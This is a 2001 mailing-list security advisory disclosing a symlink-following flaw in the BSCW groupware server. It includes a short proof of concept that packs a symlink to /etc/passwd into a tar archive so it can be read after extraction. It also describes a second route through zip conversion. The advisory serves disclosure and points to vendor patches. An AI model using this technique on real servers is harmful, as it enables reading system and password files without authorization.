-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 BSCW Security Issues [ Vulnerability Type ] The BSCW software follows symlinks. [ Effect ] malicious user can read every file on system that BSCW UID can read. [ Software affected ] BSCW3.x (only on *ix systems) [ Severity ] medium risk / high risk [ Solution ] install patches / updates from http://bscw.gmd.de/pycXX , where XX is the version of your python installation. DESCRIPTION: BSCW is a groupware system that runs on a webserver. For more information about BSCW visit the developer website (http://bscw.gmd.de/ and http://www.orbiteam.de ). While playing around with symlinks and how the BSCW system handles them, i noticed that it follows symlinks. Since it offers users the ability to extract .tar files into their "data-bag" (private space), symlink following can be exploited by a malicious user. To to this he/she needs to create a .tar file that contains a symlink, pointing to a file he/she wants to read. After this .tar file has been uploaded to the BSCW server and extracted by clicking on the "extract" menu option, the "data-bag" of the user contains the symlink as a BSCW data object. Clicking on it will make the BSCW system follow the symlink and retrieve the target file, so the user is able to download/view it. Example: my_host:/tmp/>ln -s /etc/passwd testlink my_host:/tmp/>tar cvf testlink.tar testlink After uploading it to the BSCW server and extracting it, you can click on the "testlink" item in your "data-bag" and retrieve the /etc/passwd file of the server. Basically the attacker can view any file on a system, as long as the UID, under which the BSCW system is running, could access it. In most cases this will be the same UID as the webserver UID (nobody, wwwrun). This can give the malicious user access to BSCW data items, he could normally not read, or worse, it could be used to retrieve the BSCW password file for cracking other user passwords or information gathering for further system penetration. The early "op_extract" fixes that but leaves a few other exploitable issues. Another vulnerability consists in the standard installation which includes a call of "zip" tool when converting .tar files to .zip files. After the "op_extract" patch you could not access the symlink, since the new extract function checks for symlinks after tar is called. By converting the attackers .tar file to a .zip file, zip will follow the symlink and pack the file, which was targeted by the link. If you have customized calls to external programs (e.g. packer conversion utilities) in your BSCW system configuration, you should check if symlink following can be exploited). The latest patch "untar.py" introduces a wrapper, which looks for symlinks and seem to fix all symlink vulnerabilities. You can download the patches and view the installation instructions at http://bscw.gmd.de/pycXX , where XX is the version of your installed python package (e.g. http://bscw.gmd.de/pyc20 for python 2.0). The developers of bscw have done a good job patching the security holes within 24h, after i sent them a notice about the vulnerability. neovatar neovatar(at)wiretap(dot)de public key at http://www.wiretap.de/neovatar.pub DISCLAIMER: im not affiliated with GMD or ORBITEAM or BSCW in any way. Registered trademarks and terms in this report belong to their owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE7hFTBzEyYWk8cQasRAhAiAKCOCYleJnk49KxPDzAht2GPwKmbKgCdGQBq iHXuhdS5onO9/JAs97FhrH0= =gmh1 -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Wed Aug 22 2001 - 18:27:02 PDT